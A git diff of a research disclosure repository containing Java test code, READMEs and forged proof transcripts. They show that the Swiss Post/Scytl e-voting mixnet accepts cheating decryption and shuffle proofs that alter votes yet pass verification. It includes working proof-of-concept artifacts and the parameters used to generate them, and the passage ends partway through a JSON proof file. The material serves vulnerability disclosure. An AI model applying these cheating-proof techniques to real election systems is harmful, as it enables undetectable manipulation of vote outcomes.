diff --git a/DecryptionCheatingProofs/DecyptionProofTest_Insert.java b/DecryptionCheatingProofs/DecyptionProofTest_Insert.java new file mode 100644 index 0000000..2f99b00 --- /dev/null +++ b/DecryptionCheatingProofs/DecyptionProofTest_Insert.java @@ -0,0 +1,74 @@ +// This file is produced to demonstrate a problem in the Sctyl/SwissPost decryption proof. +// It implements a cheating decryption proof method described in a report by +// Sarah Jamie Lewis, Olivier Pereira and Vanessa Teague. +// This function should be copied in to +// /scytl-cryptolib/cryptolib-proofs/src/test/java/com/scytl/cryptolib/proofs/service/DecryptionProofTest.java +// and run. + + @Test + public final void deserializeProofFromJSONAndCheckOk() + throws GeneralCryptoLibException { + + ProofsService proofsServiceForDefaultPolicy = new ProofsService(); + + ElGamalPublicKey publicKey = ElGamalPublicKey.fromJson("{\"publicKey\":{\"zpSubgroup\":{\"g\":\"Ag==\",\"p\":\"AK+RIPEJgBcfry8YICwtmoutvw==\",\"q\":\"V8iQeITAC4/Xl4wQFhbNRdbf\"},\"elements\":[\"QaWCaQ9VT+HC/M3NIIdgtbzi\"]}}"); + ElGamalPrivateKey privateKey = ElGamalPrivateKey.fromJson("{\"privateKey\":{\"zpSubgroup\":{\"g\":\"Ag==\",\"p\":\"AK+RIPEJgBcfry8YICwtmoutvw==\",\"q\":\"V8iQeITAC4/Xl4wQFhbNRdbf\"},\"exponents\":[\"KBZ/CN6wjWmK2/UqfG9xMY4U\"]}}"); + BigInteger p = publicKey.getGroup().getP(); + BigInteger q = publicKey.getGroup().getQ(); + + // Prove that the private key and public key correspond. + + System.out.println("Checking that private and public keys correspond.\n"); + ZpGroupElement testPubKey = publicKey.getGroup().getGenerator().exponentiate(privateKey.getKeys().get(0)); + if (!testPubKey.equals(publicKey.getKeys().get(0)) || !publicKey.getGroup().equals(privateKey.getGroup())) { + System.out.println("ERROR: The public key does not match the private key."); + } + + // Load the proof that a nonsense ciphertext actually decrypts to 7. + + List plainText7 = new ArrayList(); + plainText7.add(new ZpGroupElement(new BigInteger("7"),p,q)); + Proof deserializedProof7 = Proof.fromJson("{\"zkProof\":{\"hash\":\"AiJOnK6Ogb3rIOMEHeS8TrFp\",\"values\":[\"Vm/69W8YWjmzXYyeMQUtMgtO\"],\"q\":\"V8iQeITAC4/Xl4wQFhbNRdbf\"}}"); + Ciphertext cheatingCiphertext = new CiphertextImpl(new ZpGroupElement(new BigInteger("14006614111069520674417588732162224161732678"),p,q), + new ZpGroupElement(new BigInteger("12443487329224121281177020933874319855098423"),p,q)); + + System.out.println("Verifying Proof 1"); + System.out.println("Claimed plaintext = "+plainText7.get(0)); + + // Verify Proof. + + Assert.assertTrue(proofsServiceForDefaultPolicy + .createProofVerifierAPI(publicKey.getGroup()).verifyDecryptionProof( + publicKey, cheatingCiphertext, plainText7, deserializedProof7)); + + // Print decryption + + ElGamalServiceAPI elGamalService = new ElGamalService(); + CryptoAPIElGamalDecrypter decrypter = elGamalService.createDecrypter(privateKey); + System.out.println("True decryption = "+decrypter.decrypt(new ElGamalComputationsValues(cheatingCiphertext.getGamma(), cheatingCiphertext.getPhis()), true)); + System.out.println("Proof verified.\n"); + + // Load the proof that an encryption of 3 actually decrypts to nonsense. + + List plaintextNonsense = new ArrayList(); + plaintextNonsense.add(new ZpGroupElement(new BigInteger("2750132861347711778626352267580572009032361"),p,q)); + Proof deserializedProof3Nonsense = Proof.fromJson("{\"zkProof\":{\"hash\":\"Ta51IEr4v7yGHV1NFqQM9AUM\",\"values\":[\"R6g+q1MFEQfKaVnqxDq9Z5YK\"],\"q\":\"V8iQeITAC4/Xl4wQFhbNRdbf\"}}"); + Ciphertext cheatingCiphertext3 = new CiphertextImpl(new ZpGroupElement(new BigInteger("10457373340113899312563075688819286008051707"),p,q), + new ZpGroupElement(new BigInteger("3688530922996676253768130087998100046112146"),p,q)); + + System.out.println("Verifying Proof 2"); + System.out.println("Claimed plaintext = "+plaintextNonsense.get(0)); + + // Verify Proof + + Assert.assertTrue(proofsServiceForDefaultPolicy + .createProofVerifierAPI(publicKey.getGroup()).verifyDecryptionProof( + publicKey, cheatingCiphertext3, plaintextNonsense, deserializedProof3Nonsense)); + + // Print decryption + System.out.println("True decryption = "+decrypter.decrypt(new ElGamalComputationsValues(cheatingCiphertext3.getGamma(), cheatingCiphertext3.getPhis()), true)); + System.out.println("Proof verified."); + + + } + diff --git a/DecryptionCheatingProofs/README b/DecryptionCheatingProofs/README new file mode 100644 index 0000000..2ddd5b0 --- /dev/null +++ b/DecryptionCheatingProofs/README @@ -0,0 +1,32 @@ +This folder contains proof transcripts that demonstrate a +flaw in the decryption proof method implemented in the +SwissVote-Scytl mixnet. It was generated by Sarah Jamie Lewis, Olivier +Pereira and Vanessa Teague, using techniques described in our report. + +It is completely distinct from our earlier paper, which described +trapdoors in the shuffle mechanism. Even if that issue were corrected, +this problem would remain. + +In order to verify the proof transcripts, you will need to have a running +copy of the Swisspost-Scytl voting system. + +Copy the function deserializeProofFromJSONAndCheckOk() from +DecryptionProofTest_Insert.java into +/scytl-cryptolib/cryptolib-proofs/src/test/java/com/scytl/cryptolib/proofs/service/DecryptionProofTest.java +and run it. + +You can see two different cheating decryption proofs hardcoded into the +function. The first one contains a nonsense value, which it proves to decrypt to 7. +The second one contains a 3, but proves that it decrypts to a nonsense value. + +When you run the function, you should get the following output: + +Verifying Proof 1 +Claimed plaintext = ZpGroupElement [_value=7, _p=15294034768093677312256663166625633354362303, _q=7647017384046838656128331583312816677181151] +True decryption = [ZpGroupElement [_value=12209177965119662820522312937377420599612363, _p=15294034768093677312256663166625633354362303, _q=7647017384046838656128331583312816677181151]] +Proof verified. + +Verifying Proof 2 +Claimed plaintext = ZpGroupElement [_value=2750132861347711778626352267580572009032361, _p=15294034768093677312256663166625633354362303, _q=7647017384046838656128331583312816677181151] +True decryption = [ZpGroupElement [_value=3, _p=15294034768093677312256663166625633354362303, _q=7647017384046838656128331583312816677181151]] +Proof verified. diff --git a/TrapdoorCommitmentCheatingProofs/BgIntegrationTestUpdate.java b/TrapdoorCommitmentCheatingProofs/BgIntegrationTestUpdate.java new file mode 100644 index 0000000..39d909b --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/BgIntegrationTestUpdate.java @@ -0,0 +1,160 @@ +/* + * This file is produced by Sarah Jamie Lewis, Olivier Pereira and Vanessa Teague to demonstrate a trapdoor in + * the SwissVote-Scytl implementation of Bayer-Groth proofs. + * + * It is intended to be applied to our four demonstration proof transcripts, made available along with + * this file. The transcripts pass verification but change the outcome of the election. + * + * March 1st, 2019. + * + */ +package com.scytl.products.ov.mixnet; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.FileInputStream; +import java.io.IOException; + +import java.math.BigInteger; + +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.ArrayList; +import java.util.List; + + +import com.scytl.products.ov.mixnet.commons.io.*; + +import org.junit.Assert; +import org.junit.BeforeClass; +import org.junit.Test; + +import com.scytl.cryptolib.api.exceptions.GeneralCryptoLibException; +import com.scytl.cryptolib.elgamal.bean.ElGamalPublicKey; +import com.scytl.cryptolib.elgamal.cryptoapi.Ciphertext; +import com.scytl.cryptolib.mathematical.groups.impl.ZpSubgroup; +import com.scytl.products.ov.mixnet.commons.ballots.ElGamalEncryptedBallots; +import com.scytl.products.ov.mixnet.commons.beans.proofs.ShuffleProof; +import com.scytl.products.ov.mixnet.commons.homomorphic.impl.GjosteenElGamal; +import com.scytl.products.ov.mixnet.commons.proofs.bg.commitments.CommitmentParams; +import com.scytl.products.ov.mixnet.commons.tools.CiphertextTools; +import com.scytl.products.ov.mixnet.commons.tools.MatrixArranger; +import com.scytl.products.ov.mixnet.commons.tools.MultiExponentiation; +import com.scytl.products.ov.mixnet.commons.tools.MultiExponentiationImpl; +import com.scytl.products.ov.mixnet.commons.validation.EncryptedBallotsDuplicationValidator; +import com.scytl.products.ov.mixnet.commons.validation.EncryptedBallotsValidator; +import com.scytl.products.ov.mixnet.commons.validation.EncryptedBallotsValidatorManager; +import com.scytl.products.ov.mixnet.proofs.bg.shuffle.ShuffleProofVerifier; + +import static com.scytl.products.ov.mixnet.commons.io.CommitmentParamsReader.readCommitmentParamsFromStream; + +public class BaseBGMixnetIOVerifierITest { + + private static ZpSubgroup zp; + + private static int m; + + private static int n; + + + private static int numiterations; + + private static CommitmentParams commitmentParams; + + private static GjosteenElGamal elgamal; + + private static JSONProofsReader proofsReader; + + private static ElGamalEncryptedBallotsLoader elgamalEncryptedBallotsLoader; + + private static MultiExponentiation limMultiExpo; + + private static CiphertextTools ciphertextTools; + + // Comment out as appropriate depending on whether you're running the full test or the zero test + private static boolean CHEATING2 = true; + private static String zeroFlag = ""; + //private static String zeroFlag = "-zero"; + static String twoFlag = CHEATING2 ? "-2" : ""; + + private static String proofsPath="/tmp/SwissVoteTest/proofs"+twoFlag+zeroFlag+"/"; + + @BeforeClass + public static void setUp() throws IOException, GeneralCryptoLibException { + + BigInteger p = new BigInteger("15294034768093677312256663166625633354362303"); + BigInteger q = p.subtract(BigInteger.ONE).divide(BigInteger.valueOf(2)); + BigInteger g = new BigInteger("2"); + + zp = new ZpSubgroup(g, p, q); + ElGamalPublicKey pubKey = ElgamalPublicKeyReader.readPublicKeyFromStream(new FileInputStream(proofsPath+"publicKey"+twoFlag+zeroFlag+".out")); + elgamal = new GjosteenElGamal(zp,pubKey); + + m = 2; + + n = 2; + + proofsReader = new JSONProofsReader(); + + final List listValidators = new ArrayList<>(); + listValidators.add(new EncryptedBallotsDuplicationValidator()); + EncryptedBallotsValidatorManager validator = new EncryptedBallotsValidatorManager(listValidators); + elgamalEncryptedBallotsLoader = new ElGamalEncryptedBallotsLoader(validator); + + limMultiExpo = MultiExponentiationImpl.getInstance(); + + ciphertextTools = new CiphertextTools(limMultiExpo); + } + + private static CommitmentParams readCommitmentParamsFromFile() throws IOException { + + final Path pathCommitmentParamsFile = + Paths.get(proofsPath+"commitmentParams"+twoFlag+zeroFlag+".out"); + FileInputStream fis = new FileInputStream(pathCommitmentParamsFile.toFile()); + return readCommitmentParamsFromStream(zp, fis); + } + + @Test + public void givenSmallConfigWhenShuffleThenOK() + throws IOException, GeneralCryptoLibException { + + // ///////////////////////////////////////////////// + // + // Verify the proofs + // + // ///////////////////////////////////////////////// + + final ElGamalEncryptedBallots encryptedBallots_VerifierCopy = + elgamalEncryptedBallotsLoader.loadCSV(zp, new FileInputStream(proofsPath+"input"+twoFlag+zeroFlag+".csv")); + + final Ciphertext[][] originalCiphertexts_VerifierCopy = + MatrixArranger.arrangeInCiphertextMatrix(encryptedBallots_VerifierCopy, m, n); + + final ElGamalEncryptedBallots reencryptedBallots; + reencryptedBallots = elgamalEncryptedBallotsLoader.loadCSV(zp, new FileInputStream( + Paths.get(proofsPath+"output"+twoFlag+zeroFlag+".csv").toFile())); + + final Ciphertext[][] reencryptedCiphertexts_VerifierCopy = + MatrixArranger.arrangeInCiphertextMatrix(reencryptedBallots, m, n); + + commitmentParams = readCommitmentParamsFromFile(); + System.out.println(commitmentParams.getG()[0]); + + final ShuffleProofVerifier verifier = new ShuffleProofVerifier(zp, elgamal, commitmentParams, + originalCiphertexts_VerifierCopy, reencryptedCiphertexts_VerifierCopy, m, n, 0, numiterations, + ciphertextTools, limMultiExpo); + + final ShuffleProof shuffleProof_VerifierCopy = proofsReader.read( + new FileInputStream(Paths.get(proofsPath+"complete-proof"+twoFlag+zeroFlag+".json").toFile())); + + System.out.println("Shuffle Proof: "+ shuffleProof_VerifierCopy.getSecondAnswer().toString()); + + final boolean testResult = verifier.verifyProof(shuffleProof_VerifierCopy.getInitialMessage(), + shuffleProof_VerifierCopy.getFirstAnswer(), shuffleProof_VerifierCopy.getSecondAnswer()); + + final String errorMsg = "proofs failed to validate"; + Assert.assertTrue(errorMsg, testResult); + } +} + + diff --git a/TrapdoorCommitmentCheatingProofs/README b/TrapdoorCommitmentCheatingProofs/README new file mode 100644 index 0000000..5860ee2 --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/README @@ -0,0 +1,212 @@ +This folder contains proof transcripts that demonstrate a trapdoor in the +SwissVote-Scytl mixnet. It was generated by Sarah Jamie Lewis, Olivier +Pereira and Vanessa Teague, using techniques described in our report, +"Ceci n'est pas une preuve." + +In order to verify the proof transcripts, you will need to have a running +copy of the Swisspost-Scytl voting system, which was made available to +researchers through the Swiss public intrusion test at +https://onlinevote-pit.ch/details/ + +Folders proof/ and proof-zero/ each contain a manipulated proof transcript, each for +the sequence of votes (2,2,3,7). In each case, the mixnet manipulates the outcome +and produces ciphertexts (2,3,3,7) as output, along with a correctness proof +that passes verification. + +The transcript in proof/ is a typical run of a real election system, in which the votes +are properly encrypted with random values. The transcript in proof-zero is an atypical +run for demonstration purposes, in which zero randomness is used - thus the +manipulation is immediately obvious to a human reader. + +Folders proof-2/ and proof-2-zero/ each contain a manipulated proof transcript +that implements the second kind of cheating described in our paper, in section 2.2.2. +In this cheat, every ciphertext is multiplied by 2. Again proof-2/ contains +a typical run with real randomness, while proof-2-zero/ contains a run in which +zero randomness is used. Hence the cheating is immediately obvious. + + +Instructions: +1. Unzip the files and store the proof transcripts. +2. In your copy of the Swisspost-Scytl code, replace the contents of online-voting-mixing/mixnet-engine/src/test/java/com/scytl/products/ov/mixnet/BaseBGMixnetIOVerifierITest.java with BgIntegrationTestUpdate.java +3. Update the proofsPath in BgIntegrationTestUpdate.java to wherever you stored the proofs. +4. Run givenSmallConfigWhenShuffleThenOK() +5. You should see that the proof passes verification. + +************* +The test in proof/ is run with the following inputs: + +private static boolean CHEATING = true; +private static boolean CHEATING2 = false; + + BigInteger p = new BigInteger("15294034768093677312256663166625633354362303"); + q = p.subtract(BigInteger.ONE).divide(BigInteger.valueOf(2)); + BigInteger g = new BigInteger("2"); + + zp = new ZpSubgroup(g, p, q); + + //Note + //pow(2, 2972987297297297296356982562, p) + //5943523178887533241241798626972220822590095 + ZpGroupElement[] publicKeyArray = new ZpGroupElement[1]; + publicKeyArray[0] = new ZpGroupElement(new BigInteger("5943523178887533241241798626972220822590095"), zp.getP(), zp.getQ()); + ElGamalPublicKey publicKey = new ElGamalPublicKey(Arrays.asList(publicKeyArray), zp); + + final GjosteenElGamal elgamal = new GjosteenElGamal(zp, publicKey); + + ZpGroupElement[] elements3 = getAsGroupElementArray(3, zp); + ZpGroupElement[] elements2 = getAsGroupElementArray(2, zp); + ZpGroupElement[] elements9 = getAsGroupElementArray(7, zp); + + final GjosteenElGamalRandomness rhoPrime11 = new GjosteenElGamalRandomness(234522456, q); + final GjosteenElGamalRandomness rhoPrime12 = new GjosteenElGamalRandomness(788749345, q); + final GjosteenElGamalRandomness rhoPrime21 = new GjosteenElGamalRandomness(543783459, q); + final GjosteenElGamalRandomness rhoPrime22 = new GjosteenElGamalRandomness(741325490, q); + + final GjosteenElGamalRandomness[] rhoPrime = {rhoPrime11, rhoPrime12, rhoPrime21, rhoPrime22}; + + final Ciphertext C11 = elgamal.encrypt(elements2, rhoPrime11); + final Ciphertext C12 = elgamal.encrypt(elements2, rhoPrime12); + final Ciphertext C21 = elgamal.encrypt(elements3, rhoPrime21); + final Ciphertext C22 = elgamal.encrypt(elements9, rhoPrime22); + + final GjosteenElGamalRandomness rho11 = new GjosteenElGamalRandomness(345167524, q); + final GjosteenElGamalRandomness rho12 = new GjosteenElGamalRandomness(435732453, q); + final GjosteenElGamalRandomness rho21 = new GjosteenElGamalRandomness(892468901, q); + final GjosteenElGamalRandomness rho22 = new GjosteenElGamalRandomness(252437823, q); + + and then the third element (C21) is copied over the second (C12). + +**************** +The test in proof-zero/ is run with the following inputs: + +private static boolean CHEATING = true; +private static boolean CHEATING2 = false; + + BigInteger p = new BigInteger("15294034768093677312256663166625633354362303"); + q = p.subtract(BigInteger.ONE).divide(BigInteger.valueOf(2)); + BigInteger g = new BigInteger("2"); + + zp = new ZpSubgroup(g, p, q); + + //Note + //pow(2, 2972987297297297296356982562, p) + //5943523178887533241241798626972220822590095 + ZpGroupElement[] publicKeyArray = new ZpGroupElement[1]; + publicKeyArray[0] = new ZpGroupElement(new BigInteger("5943523178887533241241798626972220822590095"), zp.getP(), zp.getQ()); + ElGamalPublicKey publicKey = new ElGamalPublicKey(Arrays.asList(publicKeyArray), zp); + + final GjosteenElGamal elgamal = new GjosteenElGamal(zp, publicKey); + + ZpGroupElement[] elements3 = getAsGroupElementArray(3, zp); + ZpGroupElement[] elements2 = getAsGroupElementArray(2, zp); + ZpGroupElement[] elements9 = getAsGroupElementArray(7, zp); + + final GjosteenElGamalRandomness rhoPrime11 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime12 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime21 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime22 = new GjosteenElGamalRandomness(0, q); + + final GjosteenElGamalRandomness[] rhoPrime = {rhoPrime11, rhoPrime12, rhoPrime21, rhoPrime22}; + + final Ciphertext C11 = elgamal.encrypt(elements2, rhoPrime11); + final Ciphertext C12 = elgamal.encrypt(elements2, rhoPrime12); + final Ciphertext C21 = elgamal.encrypt(elements3, rhoPrime21); + final Ciphertext C22 = elgamal.encrypt(elements9, rhoPrime22); + + final GjosteenElGamalRandomness rho11 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho12 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho21 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho22 = new GjosteenElGamalRandomness(0, q); + + and then the third element (C21) is copied over the second (C12). + + +*********** +The test in proof-2-zero/ is run with the following inputs: + +private static boolean CHEATING = false; +private static boolean CHEATING2 = true; + +BigInteger p = new BigInteger("15294034768093677312256663166625633354362303"); + q = p.subtract(BigInteger.ONE).divide(BigInteger.valueOf(2)); + BigInteger g = new BigInteger("2"); + +ZpGroupElement[] publicKeyArray = new ZpGroupElement[1]; + publicKeyArray[0] = new ZpGroupElement(new BigInteger("5943523178887533241241798626972220822590095"), zp.getP(), zp.getQ()); + ElGamalPublicKey publicKey = new ElGamalPublicKey(Arrays.asList(publicKeyArray), zp); + + final GjosteenElGamal elgamal = new GjosteenElGamal(zp, publicKey); + + ZpGroupElement[] elements3 = getAsGroupElementArray(3, zp); + ZpGroupElement[] elements2 = getAsGroupElementArray(2, zp); + ZpGroupElement[] elements7 = getAsGroupElementArray(7, zp); + + final GjosteenElGamalRandomness rhoPrime11 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime12 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime21 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rhoPrime22 = new GjosteenElGamalRandomness(0, q); + + final GjosteenElGamalRandomness[] rhoPrime = {rhoPrime11, rhoPrime12, rhoPrime21, rhoPrime22}; + + final Ciphertext C11 = elgamal.encrypt(elements3, rhoPrime11); + final Ciphertext C12 = elgamal.encrypt(elements3, rhoPrime12); + final Ciphertext C21 = elgamal.encrypt(elements7, rhoPrime21); + final Ciphertext C22 = elgamal.encrypt(elements7, rhoPrime22); + + final GjosteenElGamalRandomness rho11 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho12 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho21 = new GjosteenElGamalRandomness(0, q); + final GjosteenElGamalRandomness rho22 = new GjosteenElGamalRandomness(0, q); + + final GjosteenElGamalRandomness[] rho = {rho11, rho12, rho21, rho22}; + final Ciphertext[][] vecC = {{C11, C12 }, {C21, C22 }}; + + Ciphertext[][] ciphertexts = { + {C11.multiply(elgamal.encrypt(elements2, rho11)), + C12.multiply(elgamal.encrypt(elements2, rho12))}, + {C21.multiply(elgamal.encrypt(elements2, rho21)), + C22.multiply(elgamal.encrypt(elements2, rho22))} + }; + +*********** + +The test in proof-2/ is run with the following inputs: + +private static boolean CHEATING = false; +private static boolean CHEATING2 = true; + + ZpGroupElement[] publicKeyArray = new ZpGroupElement[1]; + publicKeyArray[0] = new ZpGroupElement(new BigInteger("5943523178887533241241798626972220822590095"), zp.getP(), zp.getQ()); + ElGamalPublicKey publicKey = new ElGamalPublicKey(Arrays.asList(publicKeyArray), zp); + + final GjosteenElGamal elgamal = new GjosteenElGamal(zp, publicKey); + + ZpGroupElement[] elements3 = getAsGroupElementArray(3, zp); + ZpGroupElement[] elements2 = getAsGroupElementArray(2, zp); + ZpGroupElement[] elements7 = getAsGroupElementArray(7, zp); + + final GjosteenElGamalRandomness rhoPrime11 = new GjosteenElGamalRandomness(234522456, q); + final GjosteenElGamalRandomness rhoPrime12 = new GjosteenElGamalRandomness(788749345, q); + final GjosteenElGamalRandomness rhoPrime21 = new GjosteenElGamalRandomness(543783459, q); + final GjosteenElGamalRandomness rhoPrime22 = new GjosteenElGamalRandomness(741325490, q); + + final GjosteenElGamalRandomness[] rhoPrime = {rhoPrime11, rhoPrime12, rhoPrime21, rhoPrime22}; + + final Ciphertext C11 = elgamal.encrypt(elements3, rhoPrime11); + final Ciphertext C12 = elgamal.encrypt(elements3, rhoPrime12); + final Ciphertext C21 = elgamal.encrypt(elements7, rhoPrime21); + final Ciphertext C22 = elgamal.encrypt(elements7, rhoPrime22); + + final GjosteenElGamalRandomness rho11 = new GjosteenElGamalRandomness(345167524, q); + final GjosteenElGamalRandomness rho12 = new GjosteenElGamalRandomness(435732453, q); + final GjosteenElGamalRandomness rho21 = new GjosteenElGamalRandomness(892468901, q); + final GjosteenElGamalRandomness rho22 = new GjosteenElGamalRandomness(252437823, q); + + final GjosteenElGamalRandomness[] rho = {rho11, rho12, rho21, rho22}; + final Ciphertext[][] vecC = {{C11, C12 }, {C21, C22 }}; + + Ciphertext[][] ciphertexts = { + {C11.multiply(elgamal.encrypt(elements2, rho11)), + C12.multiply(elgamal.encrypt(elements2, rho12))}, + {C21.multiply(elgamal.encrypt(elements2, rho21)), + C22.multiply(elgamal.encrypt(elements2, rho22))} diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2-zero/commitmentParams-2-zero.out b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/commitmentParams-2-zero.out new file mode 100644 index 0000000..53367af --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/commitmentParams-2-zero.out @@ -0,0 +1,6 @@ +15294034768093677312256663166625633354362303 +7647017384046838656128331583312816677181151 +2 +14300310186259999603861089512845514672508694 +4501625223818925040714597010563229610570084 +8396288750628458020391470159535161063338119 diff --git a/TrapdoorCommitmentCheatingProofs/proofs-2-zero/complete-proof-2-zero.json b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/complete-proof-2-zero.json new file mode 100644 index 0000000..b7dc7da --- /dev/null +++ b/TrapdoorCommitmentCheatingProofs/proofs-2-zero/complete-proof-2-zero.json @@ -0,0 +1,253 @@ +{ + "initialMessage" : [ { + "element" : { + "value" : 13659771989630969101559130274356943184691900, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 7947923015819703146643495375895498777389904, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "firstAnswer" : [ { + "element" : { + "value" : 9767444602436655882593068831914187193966478, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13858966410728751984253619700561325267729225, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "secondAnswer" : { + "msgPA" : { + "commitmentPublicB" : { + "element" : { + "value" : 1857645376534809588145067319443900759135195, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "iniSVA" : { + "commitmentPublicD" : { + "element" : { + "value" : 13564639239755886964863168741248722394983103, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicLowDelta" : { + "element" : { + "value" : 6914123205973139875124392447290002261712985, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicHighDelta" : { + "element" : { + "value" : 6415410617159308335146409165591342947034212, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } + }, + "ansSVA" : { + "exponentsTildeA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1834981019355055407388899249814772360565616 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3651834091099384660268665862790578113601831 + } ], + "exponentsTildeB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1834981019355055407388899249814772360565616 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 4493354646051673506140091219856862041892984 + } ], + "exponentTildeR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1354997269384819654194794096005017659127767 + }, + "exponentTildeS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3738170608614679703188403059589587940256255 + } + }, + "iniHPA" : { + "commitmentPublicB" : [ { + "element" : { + "value" : 9256844904751239190280292233480410468122098, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1857645376534809588145067319443900759135195, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "ansHPA" : { + "initial" : { + "commitmentPublicA0" : { + "element" : { + "value" : 14017284052659234492019014501488604656837305, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicBM" : { + "element" : { + "value" : 7515575228409149581763443361429934467906365, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicD" : [ { + "element" : { + "value" : 9489162227995962789320451382329786219618431, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 4889076328983737768979434063385815536042118, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 3782631989506493571395234723418892431650080, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13182418003662729821425300670960328554641063, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ] + }, + "answer" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5427765002411665207103028812689136507073120 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5866561943384277043911724799626357219119837 + } ], + "exponentsB" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1328831542182132794140315983555570105582113 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2094306994419475451213355387777570099523040 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 6715256392542814143044662920419601900069194 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 5050277813597792509543307599267377027840882 + }, + "exponentT" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2323699355351835670351487345539626172476706 + } + } + } + }, + "iniMEBasic" : { + "commitmentPublicA0" : { + "element" : { + "value" : 8140883804511527211848601638409036575763452, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, + "commitmentPublicB" : [ { + "element" : { + "value" : 12677174590714927975992292060308673928909601, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 13750921665499811167795719843206888994827771, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + }, { + "element" : { + "value" : 1597259658597319316366709673585474938628997, + "p" : 15294034768093677312256663166625633354362303, + "q" : 7647017384046838656128331583312816677181151 + } + } ], + "ciphertextsE" : [ { + "gamma" : "3336146937099309094595479612213974657715748;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "2449130554676320405772754856973422354410979;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "1357467814375269533380371965023367780992308;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "4944474899212713389335823385237965120796748;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "1;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "12498420619291728485042406324608708219447593;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + }, { + "gamma" : "10096179232613308934358026239482718306175109;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151", + "phis" : "11494468609495425694566074444047854680936252;15294034768093677312256663166625633354362303;7647017384046838656128331583312816677181151" + } ] + }, + "ansMEBasic" : { + "exponentsA" : [ { + "q" : 7647017384046838656128331583312816677181151, + "value" : 2388501870119749412138369019440304981955053 + }, { + "q" : 7647017384046838656128331583312816677181151, + "value" : 1826967192013227313819391285749940433268381 + } ], + "exponentR" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7269667973018668440967069518540106684241356 + }, + "exponentsB" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 7382194830550256170522008811234690229688497 + }, + "exponentS" : { + "q" : 7647017384046838656128331583312816677181151, + "value" : 3192786585807565827666175254703441632166101 + }, + 